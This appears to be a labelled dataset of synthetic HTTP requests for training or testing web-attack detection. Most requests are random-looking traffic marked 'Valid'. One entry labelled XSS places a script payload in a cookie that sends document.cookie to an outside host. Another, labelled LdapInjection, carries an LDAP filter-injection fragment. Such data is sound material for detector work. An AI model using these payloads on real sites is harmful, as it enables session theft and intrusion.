From: ttIceawb@smJnerkeg.com
If-Modified-Since: Tue, 01 Sep 09 13:05:45 CET
If-Unmodified-Since: Sat, 28 Mar 09 06:34:40 CET
If-Match: "yGnbZNIt3aj4e-NjrEi8"
If-None-Match: *
If-Range: Wed, 06 Feb 08 19:08:55 GMT
Max-Forwards: 143
MIME-Version: 9.1
Pragma: lwr='lh'
Proxy-Authorization: NTLM YmVlaHJpZVNvNXlmamZwYW4xYWRydDdod3Noc3NsT3RrM280aWw=
Authorization: Basic ZVNFSlU6MDR0bGNl
Range: 32-,-2376,11-22251
Referer: /cslricka/g9hfn/atuenl/tsreu/trn1s.nsf
TE: chunked,trailers,chunked
Trailer: Upgrade
User-Agent: reyisd (rnTtP8lUza; slMT2.BF; 0x9a.pBRVH)
UA-CPU: StrongARM
UA-Disp: 284,977,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 016x6303
Via: 8.7 www.R8ag.htm
Transfer-Encoding: nnfi
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 623 193.252.199.121 "khrNsixEqbqewainsMhL" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 8829334144305
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49308
Start - Id: 12145
class: Valid
GET /02ninclude2xN/Roesz5datt/f5UBJDgFcZD/mhi8npd/iub6Ndttbs/d9yScDlNpY/icQtas/btu.tiff?4edyfa=oemcr&hezroa=kot&ures=ihh1hrDauedn+r&ninirrySehebian=8119&ni4aerepauEgEaN=3854&e4=1&shotd=wr&Eo07G=eatbn%3Det+bin%5Ba+&cWclhaueos2eise=0&s4oht=90300798&entd5asZyi2u=mfbJpP&uun30itjq=eiFhapdy HTTP/1.1
Host: 122.9.64.78:80
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.7
Accept-Encoding: identity, gzip;q=0.8
Accept-Language: sttl-a8z2;q=0.4
Cache-Control: only-if-cached
Client-ip: 198.154.140.114
Cookie: 2id=mvqd;rtqemwMwdqose=eJkjFgwe7@;0l3lt=6691;tcuscaoaNso=327093;nale=rk;6.YNinsertkes=ihsd9hsnths
Cookie2: $Version="99"
Date: Thu, 20 Mar 08 08:07:41 UTC
ETag: W/"QRTugnwI4TSG7q17by"
Expect: Cdifir=dcelnn;amtemdi
From: oiee@naie7nc.net
If-Modified-Since: Wed, 18 Nov 09 18:17:59 GMT
If-Unmodified-Since: Sat, 27 Mar 04 06:10:42 UTC
If-Match: *
If-None-Match: "taNmf.ozjg5pRGJmcA0"
If-Range: "wGSyjAA9_oVMm86Hbff"
Max-Forwards: 15
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Digest nc=6E59aab8
Authorization: Basic ejF5Y3NlOjRoaEU=
Range: 442-028,989879-74,-93660
Referer: http://aezrhlge.ch/r8nR/eltd/Om3mstr/7nsdssdn/eei8g.txt
TE: trailers,deflate;q=0.9,trailers
Trailer: If-Range
User-Agent: Datote (tXgKhI5)
UA-CPU: x86
UA-Disp: 908,936,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 438x0789
Via: 3.1 www.btugbyfa.png, 7.5 www.utsziu.css:8302, tzr/2.4 108.32.162.221
Transfer-Encoding: nrdwa; oMre=benaszA
Upgrade: necoeD/4.9
Warning: 045 0.10.164.95:0 "NssOd0mum" 
X-Forwarded-For: 215.199.241.153
X-Serial-Number: 99725023233624761
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12145
Start - Id: 13734
class: Valid
GET /eMtrL.FIQbMm_/bJfMho.MrN/pnodItilbnaa3bU/gpy5ldtzacuj/0W.htm?group byJBqaccess_logvH=ez%28+&FTMy4uPx1sampasswd=taccess_logEe%40&adnotmrnwefn=rtneoyoptwau+d&fMcusrY.s3iframer=n%3CilaedR%5DQ%5Bakgbsowsi&Eh=943&tNSeo=i%7Ennejcmsu%25etN0&ao=25589&njnrt4oEedS=5872849 HTTP/1.0
Host: www.56ye9Oasg.cz
Connection: keep-alive
Accept: text/plain;q=0.3, audio/basic
Accept-Charset: x-mac-ce;q=0.0, iso-8859-1;q=0.9
Accept-Encoding: compress;q=0.2, identity;q=0.5
Accept-Language: *
Cache-Control: no-store
Client-ip: 101.213.55.52
Cookie: c7rsc=098227070;hok=liMtIu_YJ;varoPsTpiM=dcq2;5metaRb= qkeeq;rvbscriptGFBOwHawhere=d6nege;3l=tb
Cookie2: $Version="764"
Date: Fri, 30 Sep 05 21:49:09 CET
ETag: "iKZZUhuHAFVhGQ@q"
Expect: triuwh=cn7a
From: ep4c@gnrwie6l.biz
If-Modified-Since: Sat, 23 May 09 16:34:52 CET
If-Unmodified-Since: Sat, 31 Oct 09 21:01:43 GMT
If-Match: "_ViZ_wS-zH8MXcM"
If-None-Match: *
If-Range: Sun, 29 Jan 06 02:25:37 UTC
Max-Forwards: 67
MIME-Version: 5.8
Pragma: aa5telen=insj
Proxy-Authorization: Basic aml1ajpDT2ph
Authorization: NTLM ZTVyNGJsbHB0QXNyZUlOaGVRZ29hZmVlaXJnaTkybmVydw==
Range: -4
Referer: http://www.mlli.fr/snttn/neld1oE/eiehtko.bin
TE: trailers,trailers
Trailer: If-Range
User-Agent: eeegsPosth/1.9
UA-CPU: PowerPC
UA-Disp: 096,0301,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 6985x6776
Via: iet/7.4 123.194.15.246:0, FTP/9.3 www.Q5pbth.jpg, Gxet/8.1 www.cnhii1a.tiff
Transfer-Encoding: compress
Upgrade: l4tt/6.1, gtIh/6.6, nsetrs/8.9, h1ehro/2.2
Warning: 799 www.lntleEda.png "elhhrlui" "Wed, 06 May 09 15:39:09 GMT"
X-Forwarded-For: 170.219.207.191
X-Serial-Number: 6046766144734
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 13734
Start - Id: 38730
class: LdapInjection
GET /f89onasRi/rs/9servicesYVBhtaccesracJu/XD8%urwhere6divy/yReTcz597/edeoje4ajrHiak4sSop/tnsdLsopdaru/9eruateddle8aldoSsW/sTdelete.mKfImvar/Jaktdsechic3esaie/snthrxszp8.swf?enhl6hn=n_vnV&8eaiGL=%29+%28++%7C%28hyn31%3D4aiO*%29 HTTP/1.1
Host: 83.172.132.164
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: euc-kr, x-mac-japanese;q=0.7, big5;q=0.8, x-mac-hebrew;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 132.36.253.148
Cookie: 4a7n=oenneaAnhNi ;2hyrc=idseeztir0Hwzo7n2;c8Xsm=s-gb613ALsPE;swvc4fepeR=826927731
Cookie2: $Version="538"
Date: Tue, 30 Jun 09 18:52:55 CET
ETag: "QB_Ra65Zn9G0M2Xodqta"
Expect: 100-continue
From: siyWs@6ac5m.it
If-Modified-Since: Tue, 06 Nov 07 15:34:13 GMT
If-Unmodified-Since: Sun, 22 Feb 04 18:08:18 GMT
If-Match: "2Q.2CGmKCecOF8C4ko"
If-None-Match: "a8BfFov.wQgNTYi25UOM"
If-Range: Fri, 21 Nov 08 21:04:47 UTC
Max-Forwards: 074
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: ztgn ZDrc=dnonaeea
Authorization: NTLM dGNucnJ1NG5scmkzZG5uSGF0bnRldHJBbzh6ZFJkc3llYm1lZXQydw==
Range: -753,93960-,-52
Referer: /eoac.aspx
TE: chunked;q=0.1
Trailer: Authorization
User-Agent: Mozilla/4.7 (X11; U; Open BSD i586 6.2; re-s4; rv:4.0.5) Gecko/25546772
UA-CPU: 68000
UA-Disp: 281,271,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 094x3377
Via: 7.3 79.47.162.18
Transfer-Encoding: identity
Upgrade: u3thye/4.0, rfee/2.0
Warning: 710 168.112.195.187 "tiseidiPedr0p" 
X-Forwarded-For: 18.156.103.46
X-Serial-Number: 320181381664910
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38730
Start - Id: 24013
class: Valid
GET /Hn6/Ma5iOLhqsnzre3t3/rhwto7nlmeS.gif?BPor-tEa@=hcl&4yecceiyAetmaos=tCpassthru&edo9=73&4f=ethne3eaopsstuec&c1imourRe=kosee7reS&snaeghmen=10218&jept=4429&5tnig5it=nahXha&tyea=Eh4oMo4iTedaTc&nantaww=4&ja0iArrsTvsceE=cupdate%2F&2rr9dsufhC=c3wp-onnconnectdcmstnei HTTP/1.1
Host: 53.72.9.97
Connection: ix8r
Accept: */*
Accept-Charset: x-mac-hebrew;q=0.0
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=20
Client-ip: 172.138.38.160
Cookie: tna3mtabRt=92;yeuoeLetBddauo=47615;tifxp=2353204253;hi2dTodia=roo13hyrswaku;ytas6=nmh2ooa
Cookie2: $Version="723"
Date: Mon, 29 Dec 08 09:55:57 CET
ETag: "3a7ImKUTT9J04MmNFY5_"
Expect: 100-continue
From: 8ihnedd@EsreI51e7i.com
If-Modified-Since: Thu, 21 Dec 06 10:53:08 UTC
If-Unmodified-Since: Fri, 09 Jan 09 11:24:51 CET
If-Match: *
If-None-Match: "5BmYflWwLSqvHxEQq@B"
If-Range: Tue, 26 May 09 12:38:38 CET
Max-Forwards: 1
MIME-Version: 2.4
Pragma: tNmn2pam='rndul'
Proxy-Authorization: NTLM cmhlYWVtbHJobkV5ZGVvaGl0U2Nzd28yemVvbGFyZlRoZTdRaGxSYXg=
Authorization: ophtts etnz=4cyso
Range: -037415,0231-990,54-43391
Referer: http://Ceneoo.st/twQqo/deoohne.pl
TE: trailers,gzip;q=0.9
Trailer: Date
User-Agent: 3amdpi (eCejsSaVEm; nI0IU7pLou; sh6AY5MSW; om1oPG8QaQ)
UA-CPU: PowerPC
UA-Disp: 4414,5382,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 174x179
Via: its/9.1 www.seoos.js:95, 2.0 164.244.196.184
Transfer-Encoding: identity
Upgrade: berd/1.6
Warning: 468 102.124.44.220 "QreG49doDa" 
X-Forwarded-For: 160.213.124.93
X-Serial-Number: 54119
----: ------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 24013
Start - Id: 22628
class: Valid
GET /Rnf9eaRneOOsn9suare/egnaeTbsirn/e8iHdkyY/iACutq/urRZOm.exe? HTTP/1.0
Host: www.reppeed.biz
Connection: close
Accept: */*;q=0.4
Accept-Charset: ks_c_5601-1987;q=0.0, big5, iso-2022-kr, x-mac-greek, iso-8859-6;q=0.6
Accept-Encoding: gzip;q=0.1, identity;q=0.3
Accept-Language: dse-ieh, wOr-rsrcgsa;q=0.2
Cache-Control: no-cache
Client-ip: 158.13.254.69
Cookie: .d5.-V5j=t=;rsPovaliIehIeu=42;yyenix4cu=tpy
Cookie2: $Version="84"
Date: Thu, 12 Oct 06 07:23:08 GMT
ETag: W/"cUnGLaaSXEnKtn8o"
Expect: 100-continue
From: 4tEywso@ngmrMaatec.st
If-Modified-Since: Sat, 11 Mar 06 08:00:20 CET
If-Unmodified-Since: Fri, 20 Jul 07 22:04:37 UTC
If-Match: "2EhRYL33.H88SrI"
If-None-Match: "-CC7lRIIusZRRjmQox"
If-Range: Wed, 25 Feb 04 21:52:18 GMT
Max-Forwards: 7
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: Digest response="9271d9fffB5EFafcF66f172fcbDC3646"
Range: -43745
Referer: /S8dt/hdevE9kh/Amp6/woxqsoo/lhel.jsp
TE: trailers,deflate;q=0.2,gzip
Trailer: Accept-Encoding
User-Agent: Mozilla/3.0 (X11; U; Linux i586 1.9; ss-hn; rv:3.5.9) Gecko/01627861
UA-CPU: Sparc
UA-Disp: 0852,741,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 353x5479
Via: 9.2 www.nhas.tiff, FTP/3.9 www.4ub3bp.tiff, 8.4 139.77.208.57
Transfer-Encoding: nltu
Upgrade: atr/6.0, rel8/5.7, Taa6/8.7, mkeoa4/7.0, osqs/2.3
Warning: 281 www.inNer.css "4tJ3dtF" "Sun, 01 Nov 09 07:54:39 CET"
X-Forwarded-For: 23.196.24.89
X-Serial-Number: 705834569346
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 22628
Start - Id: 46752
class: XSS
GET /trxhkpbs/9ssdknlQ/atnennyxoterc8dTiepe.js?ndel=r&ai=423398 HTTP/1.1
Host: www.xw2enbo.org
Connection: ilocr
Accept: video/mpeg, text/plain
Accept-Charset: hz-gb-2312, x-mac-arabic;q=0.2, x-mac-turkish, iso-8859-8;q=0.3, ks_c_5601-1987
Accept-Encoding: 
Accept-Language: tt-u;q=0.7
Cache-Control: only-if-cached
Cookie: nM13QBYnode=rdUdD815VWqu;pd2nrmHpl=8;ntmnoa=ka3r0o6hOe;ii=<object  classid ="clsid:...    "  codebase="     javascript:    [document.location.replace  ('http://www.linang.com/cgi-bin/atng.cgi'+document.cookie);]" >
Cookie2: $Version="214"
Date: Thu, 03 Nov 05 19:29:46 UTC
From: u5enhgh@vclwuea.be
If-Modified-Since: Fri, 20 Jun 08 14:33:00 UTC
Max-Forwards: 2
Pragma: no-cache
Referer: /reap/ylslomq.mdb
TE: chunked;q=0.8,trailers
User-Agent: Mozilla/8.0 (Windows; U; Win 9x 7.9; Mp-cy; rv:7.3.4) Gecko/26811784
UA-Color: color16
Via: 6ba/9.3 201.3.87.86, sKrtyq/8.6 218.109.28.83:8392
Transfer-Encoding: gzip
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 46752
Start - Id: 17120
class: Valid
GET /e0HS71C6d8-vOdQAd/tigHnEtOnr/wue.w34f5rgRiwqxv/iclesa/3s/hhn.html?_FKh=dydhgsdeurarm2sdza&bmaIen1vo8t=hzs9betweentslel&8uneib=84857 HTTP/1.0
Host: 3.216.174.4
Connection: close
Accept: image/png
Accept-Charset: windows-874;q=0.6, cp-936;q=0.3, ks_c_5601-1987;q=0.5, iso-8859-3;q=0.9
Accept-Encoding: *;q=0.4
Accept-Language: sm5iidoy-stEme;q=0.2, nelerIe-ftno7az;q=0.9, ende-nrynl5tc, m-tsya0s9x;q=0.2
Cache-Control: no-cache
Client-ip: 87.242.227.184
Cookie: nd=vrahd;aeruixCteelt0=I;S6sjewpsrIgr
Cookie2: $Version="75"
Date: Sun, 25 Jun 06 12:54:27 GMT
ETag: "e1Dtcm4RQIKSAbUmrxZ"
Expect: 100-continue
From: adhnoei1@eSnoer.st
If-Modified-Since: Wed, 21 Apr 04 23:15:52 CET
If-Unmodified-Since: Mon, 05 Dec 05 19:45:47 GMT
If-Match: *
If-None-Match: "ZxMJZQ.2d49_GbCNV"
If-Range: "c5_Z7VvEFOogpCFs"
Max-Forwards: 17
MIME-Version: 4.8
Pragma: ctrzesvg='oi7eeuem'
Proxy-Authorization: fhnd 8kdtunra=1neya
Authorization: amssi er4f=PAatHN
Range: -3238,-691,-223750
Referer: /iFiseeS/Ayr6/eitllpar/lfsre/essea.mdb
TE: trailers,trailers,chunked;q=0.2
Trailer: Range
User-Agent: OOFbdrc/0.8.9
UA-CPU: StrongARM
UA-Disp: 2239,4107,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 4914x5963
Via: 4.3 35.224.139.19, 3.7 173.62.211.122:0522
Transfer-Encoding: identity
Upgrade: act/7.7, inbw/3.6
Warning: 072 www.eIatdhnV.html "Yper3dr" "Tue, 24 Feb 09 05:55:30 UTC"
X-Forwarded-For: 125.81.27.179
X-Serial-Number: 63519083
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17120
Start - Id: 19662
class: Valid
GET /thcyrheesi/o3Bmochainsert.SNexec@Q_nYK/yW/db1-gnh_LCQ/tovioHuSniiFsavi/eSO@b5vBID8/reoh/mmtska30jo2y6trOa9/M@/x0VVg_.mspx?HUab1exec_S@K=Oni+df&iks=7&nc6tsfr=ug&asduTaal=8 HTTP/1.1
Host: 202.205.16.220
Connection: Lhlthyoi
Accept: */*
Accept-Charset: shift_jis, cp-936, euc-kr
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 206.99.192.131
Cookie: htthnhpdUbgo=@all ;6Owgqs5wp-=-;secjhut9ormren=6251
Cookie2: $Version="5"
Date: Thu, 08 Apr 10 12:27:15 UTC
ETag: W/"-qsLuv-EiEwuhFBn4MD"
Expect: nsr1=r1ent9e
From: ee7M@e2fmh.it
If-Modified-Since: Thu, 12 Aug 04 12:08:27 CET
If-Unmodified-Since: Wed, 27 Aug 08 15:27:05 CET
If-Match: "9gBXlsj_@s@HDOma0"
If-None-Match: *
If-Range: Wed, 18 Jan 06 02:28:12 GMT
Max-Forwards: 9
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: NTLM YVRzb3BlZ2lBc2hhb3Rwb3JwZ2hpZTNzQW5wQWg0b25kV3NpdmlleWRl
Authorization: k6alo gePtrSo=nmete
Range: -382
Referer: http://www.lWtoN8.de/lfsskEro/rSelred.jpeg
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/2.2 (compatible; o6oueg; Win 9x; vto2oEn)
UA-CPU: StrongARM
UA-Disp: 4810,493,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 106x833
Via: HTTP/4.7 www.yakra.shtml, 6.4 www.weoine.jpeg, 4.3 www.nGsaaa.htm
Transfer-Encoding: compress
Upgrade: eShaio/0.4
Warning: 267 www.iNuh.htm "4UnmLUdicatt2si" "Fri, 21 Jul 06 15:56:52 CET"
X-Forwarded-For: 152.55.56.249
X-Serial-Number: 3717830
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 19662
Start - Id: 11477
class: Valid
GET /aaaagjwnadips0dUovi/h27kLlSR/fNj6m3MRh/rtrniso/vneL.png?enersehcrbbmsr=461337&v2meBSte=h+025+%3Et3oletxh+o7r HTTP/1.0
Host: 27.236.145.87
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: iso-8859-3;q=0.2, koi8-r;q=0.1
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: aeunDn=e
Client-ip: 207.53.36.192
Cookie: aeAnidS= 0deKmf;Bn4IBlinkk0e=tkgn03qt1I2;sml=9331089
Cookie2: $Version="15"
Date: Mon, 10 Mar 08 04:44:13 CET
ETag: W/"uok78NCd1DvlIieuna"
Expect: zhnh
From: oohw@halud.org
If-Modified-Since: Thu, 07 Dec 06 04:23:44 GMT
If-Unmodified-Since: Tue, 02 Jan 07 05:33:31 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 06 Apr 08 15:28:23 UTC
Max-Forwards: 37
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: otl1hQ 7eaee=ntgy
Authorization: Basic aHJxdG5oOmNvdGNu
Range: -517746,13-
Referer: http://dk6uh.fr/cehxt/hante.wav
TE: gzip;q=0.2,trailers,deflate
Trailer: From
User-Agent: uwsUtruh (hUQO0_N10@)
UA-CPU: PowerPC
UA-Disp: 9055,045,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 9366x217
Via: 5.5 www.Teeode.jpg, 7.8 www.tpAS0e.tiff:1883, FTP/2.4 www.anwdE4t.tiff
Transfer-Encoding: identity
Upgrade: au1/2.1, OghB/7.4, cgcvbt/8.8, aewhh/9.8
Warning: 532 www.guwhhej.jpeg "fEoeeynUyaan2" "Sat, 12 Apr 08 24:22:20 UTC"
X-Forwarded-For: 54.109.53.253
X-Serial-Number: 684447475496
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11477
Start - Id: 24736
class: Valid
GET /avczh4oJ/yw/KTZZhJOESS/NA/uaA/.2lall/M8Huhttp/SvbcatxLcWIN7Po/e7/rmueen4malaaalto/btaeneatar/sZuXvzunionNB4P1.jpg?ct8espu7fteu=tfniI_S HTTP/1.0
Host: www.34tIssovy.fr
Connection: mapcn
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: rhi4oeur-enazs
Cache-Control: no-cache
Client-ip: 171.64.97.130
Cookie: where2vq=56513;cmwttnbph=1V28QEB
Cookie2: $Version="25"
Date: Sun, 16 Jan 05 14:34:17 CET
ETag: W/"hfpc@s08k8DrWdBh"
Expect: S0eihn1
From: 4Pioe@levcc.org
If-Modified-Since: Thu, 16 Feb 06 22:11:40 CET
If-Unmodified-Since: Sun, 25 Sep 05 16:17:13 CET
If-Match: "sVZic9loSFiqEyF1_y"
If-None-Match: *
If-Range: Fri, 12 Oct 07 22:27:57 UTC
Max-Forwards: 6250
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest response="a154ecA2Daa4d865F3aF5C8cbaafee0d"
Authorization: Basic ZU1nbGFFdGU6dGJpc2c=
Range: 991-
Referer: /nuirais2/o1ctwhal/irmgdeei/46t4indi.htm
TE: deflate;q=0.5,chunked;q=0.0
Trailer: Max-Forwards
User-Agent: oLF4UVls http://www.lahfs7bN.be
UA-CPU: PowerPC
UA-Disp: 572,4672,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 1017x8120
Via: 3.7 www.imaie.jpg, utn5/5.5 42.5.224.242:3343, 9.1 www.eove.tiff:5568
Transfer-Encoding: deflate
Upgrade: g8mn/1.2, BihP/1.3, isA/2.4, gnpI/4.1
Warning: 152 www.nuoOelo.jpg "ddh66yrn" "Wed, 01 Jun 05 18:22:47 UTC"
X-Forwarded-For: 127.43.236.207
X-Serial-Number: 319119855540809
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 24736
Start - Id: 989
class: Valid
GET /n60QG_zD.Lg0/h5uX9oQdEDeJ2D/scXZCl-K4.php3?Q_SYpKscripttmp4=geb2not%3Cmtaxnu&panOxhstt=7958&exp_58q8aeqphpSb=6685976702&vN0kd=3aed+lsnull8oeQUboot.ini0aec&xp_xuJ9Bnph-=io5t&.5NWAqg=w7OOUcW0Oz&r50orWth6etmoue=loYY%25hln7tnn+yecnstall HTTP/1.0
Host: 233.152.166.249
Connection: hOeddo
Accept: audio/*, video/quicktime;q=0.3, image/*;q=0.3
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: h-onh;q=0.6, ddo-maDem, 5r-Eerecoun, y4ybhe-aamcdc
Cache-Control: max-stale=1
Client-ip: 226.147.179.150
Cookie: hn=em9gPeooiipH3sys;22cneGcemaircE=0q;nstyieuioEcsn=ie_m1e
Cookie2: $Version="1"
Date: Wed, 15 Jun 05 20:10:22 UTC
ETag: W/"LmsBhnJCBuLcN14eZE9X"
Expect: venose
From: 7de2@Vcaa.it
If-Modified-Since: Sun, 16 May 04 23:12:13 UTC
If-Unmodified-Since: Sun, 27 Jul 08 11:17:19 UTC
If-Match: "WEChW5ws_osnbKA"
If-None-Match: "C3Y3xzp0h.AAxuURlpou"
If-Range: "@aRbVyxxF9v4kJXMB8"
Max-Forwards: 5937
MIME-Version: 7.0
Pragma: endytAas=MOr
Proxy-Authorization: amit hx71ti9=tovd
Authorization: f51Toe iUNonD=cCoe
Range: 726319-,933-
Referer: http://www.efahriii.st/ete1/hymr.jsp
TE: gzip
Trailer: Cache-Control
User-Agent: Mozilla/5.8 (Machintosh; U; PPC Mac OS X 6.1; nh-eV; rv:5.9.3) Gecko/17531967
UA-CPU: MIPS
UA-Disp: 419,762,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 873x994
Via: 1.6 129.210.191.39, 5.3 www.woa8n.jpeg, 3.8 www.anaqiyr.jpeg:4
Transfer-Encoding: identity
Upgrade: leosx/9.3, dydAd/3.3, attwi/4.3, oohdna/7.5, a1gooc/3.7
Warning: 561 123.33.248.80 "ohsncetm" 
X-Forwarded-For: 162.75.24.52
X-Serial-Number: 045784
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 989
Start - Id: 9614
class: Valid
GET /eqe/rtyUj6r/aeaaiit3encmni/kBJm/DJQIBryphttpsd5o.pl?hrDn=m&9lsteldd=e9QLUqN&mmsu=9936592&f7en4lraohiNel=umlN-aTUaoTo HTTP/1.1
Host: 145.182.38.40:8
Connection: close
Accept: audio/basic;q=0.4, application/rtf;q=0.9, audio/*
Accept-Charset: iso-8859-15;q=0.9, x-mac-arabic;q=0.3
Accept-Encoding: *;q=0.1
Accept-Language: sgs8-g9op;q=0.7, ratsnt-3le;q=0.8, henddtNA-le;q=0.5
Cache-Control: no-transform
Client-ip: 196.52.173.154
Cookie: bvpnadlHo3entO=geep4p xm;epbbcc1nsboye4r=rsyk;ileamHu2icr=bwp-Radminv;Z6OvhGCT=2;eiecldh2=rchildia;dphvdaau9nF=ij@WoTc
Cookie2: $Version="29"
Date: Sat, 30 Jun 07 05:54:41 CET
ETag: W/"gNga_GorDz.4tvJVM8"
Expect: ibz2=ephse
From: yiJqeaa@9hauhsGph.fr
If-Modified-Since: Fri, 28 May 04 14:09:44 CET
If-Unmodified-Since: Thu, 18 Feb 10 04:15:11 CET
If-Match: "EDCTHXF5H9aLswjr"
If-None-Match: "Z1I5mMjZtB88rSL9rA"
If-Range: Thu, 20 Apr 06 14:34:33 CET
Max-Forwards: 238
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: iOexxu luao7=rm6admp
Authorization: NTLM aGJzdHVvZXBvZWVTb2FzaWV0ZXJrYWpiVmpuZnF5b0VzMmVJbnRyaWVFZXJ2
Range: -7568,-8915
Referer: http://www.teha.biz/bnnTe2lt.nsf
TE: trailers,trailers,gzip
Trailer: User-Agent
User-Agent: n0ebeiSempgh0btvn
UA-CPU: Sparc
UA-Disp: 8659,744,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 7520x0183
Via: 5.6 www.uptmKusa.png, HTTP/7.7 www.rntet.jpg, FTP/6.0 24.66.224.134
Transfer-Encoding: deflate
Upgrade: bcr1b/9.3, ol1eo/8.4, etne/3.1, Bs3rt9/5.7, aio/1.0
Warning: 004 www.qaG5rro.jpeg "9mp7el34osnrooE0a" "Sat, 23 Aug 08 06:38:14 CET"
X-Forwarded-For: 127.233.244.196
X-Serial-Number: 0359869
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9614
Start - Id: 16781
class: Valid
GET /6IcRhiuVsR/ttAeje/YzsH1HoPPlwindow.open/iFIgcx.azKvOsR0ITr/Po6k/fW-qWA0ubr/2Biilmieeqe6Asny.php3?i73s=o2stjnmb0mA&1fapsgstocske=tRdfdom&gTXSDBz5=Oto+zeuA%28&L8WfWrEJI=om9c.oEyyoBk&amnMa=ee%3Dbinp&aettkMnrs=27610515&krt8vneeeaeoiet=128742&Uz5.Knph-7sR=07295&s1tufir6lOle=325838 HTTP/1.0
Host: 235.178.151.111
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.6
Cache-Control: min-fresh=36796
Client-ip: 103.225.225.209
Cookie: eenRmdntevnnr=tygEbsixan;baice7esah4ia=s;nrdrgIlmte=1299855991
Cookie2: $Version="0"
Date: Sun, 13 Jun 04 24:14:51 GMT
ETag: "ZFxEHIHXibeUncC"
Expect: otepeCcs=h3dEmi
From: a2jc@3Dx4eae.st
If-Modified-Since: Wed, 11 Feb 04 24:25:58 UTC
If-Unmodified-Since: Sat, 29 Sep 07 15:40:43 GMT
If-Match: "9GnWJjqNOZwI7CDya"
If-None-Match: *
If-Range: *
Max-Forwards: 1630
MIME-Version: 0.6
Pragma: 0hs='tte3E'
Proxy-Authorization: Digest uri=/0naYTtga/isasndt/dhsaNs/gnre.pl
Authorization: Basic b2hhZ3VVOmFkdDQ2bg==
Range: 1-,-097,-093856
Referer: http://Omop.org/lErseHj/tTjtiaue.php
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/3.8 (X11; U; Linux i586 6.3; ec-sk; rv:4.0.2) Gecko/45259648
UA-CPU: PowerPC
UA-Disp: 460,9204,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 561x3269
Via: HTTP/9.0 128.241.246.56, HTTP/2.6 www.sexWlgo.tiff, HTTP/1.4 219.122.96.103:69
Transfer-Encoding: deflate
Upgrade: rtte/6.2, sdt/4.5, rianin/5.6, eelurI/6.7
Warning: 717 168.108.208.197 "uS1ftixrdafn" 
X-Forwarded-For: 38.253.106.148
X-Serial-Number: 00770838075
----: ---------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 16781
Start - Id: 23451
class: Valid
GET /l_-u/ouPHfLNkwIq23obkX/0AA/9oehilsgt3hmnlts/i8mqV11hU.php3?adnrb3eKssites9=rxtn%5C&ho8seionae7e=yenescotn-jjt HTTP/1.0
Host: 231.82.64.109
Connection: close
Accept: */*;q=0.5
Accept-Charset: *;q=0.5
Accept-Encoding: compress;q=0.0
Accept-Language: *
Cache-Control: OwuoT='iu6tzg'
Client-ip: 146.86.154.88
Cookie: tz6tidge7n7=leF5ZWcyQ;8p6wgetK.g1T=%dropet5ogl;ioin=eaow1htC
Cookie2: $Version="551"
Date: Sat, 18 Nov 06 15:49:11 UTC
ETag: W/"wi37KR_mGFB84.svA"
Expect: 100-continue
From: tocfie@tta6.cz
If-Modified-Since: Fri, 05 Mar 04 21:56:48 CET
If-Unmodified-Since: Sun, 27 Mar 05 04:25:48 CET
If-Match: "g3nHV37mR0@0.3rw4"
If-None-Match: *
